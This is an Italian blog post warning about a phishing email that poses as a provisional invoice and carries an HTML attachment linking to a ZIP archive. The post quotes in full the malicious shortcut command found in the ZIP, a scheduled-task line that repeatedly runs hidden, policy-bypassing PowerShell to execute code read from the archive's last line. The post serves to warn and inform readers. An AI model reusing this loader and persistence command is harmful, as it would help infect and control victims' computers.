In questo caso la mail è in un Italiano corretto, dove si chiede di prendere visione di una fattura provvisoria, ed ha una pagina HTML come allegato :
scaricando il file allegato e guardando dentro il codice HTML si nota:
una intestazione con link ad un file zip: aggiornamento-documentazione-FT3249046.zip
e poi il solito testo segnaposto "lorem ipsum":
sono anche cortesi e ti avvisano che potrebbe richiedere un po' di tempo.
Ho scaricato il file ZIP e dentro c'è una cosa strana: contiene un collegamento che lancia dei comandi:
questo il testo del collegamento:
C:\Windows\System32\schtasks.exe /F /create /ST 06:30 /sc minute /mo 5 /TR "powershell -nonI -eP bypasS -w hi'dde'n -c &{cd C:\Users\;$bn=gci -r -force -in aggio*.zip|select -last 1;$fe3=gc -LiteralPat $bn.fullname;$fe3[$fe3.length-1]|iex}" /TN "AI"
sembra che tenti di schedulare un task nello scheduler di Windows, che a sua volta lancia un PowerShell, andando però a prendere parte di codice contenuto dentro il file zip scaricato.
Non ho indagato oltre ed ho cancellato tutto.
Prestare sempre attenzione alle mail e agli allegati, anche se sembrano "innocui" file ZIP.
Questo commento è stato eliminato dall'autore.
RispondiElimina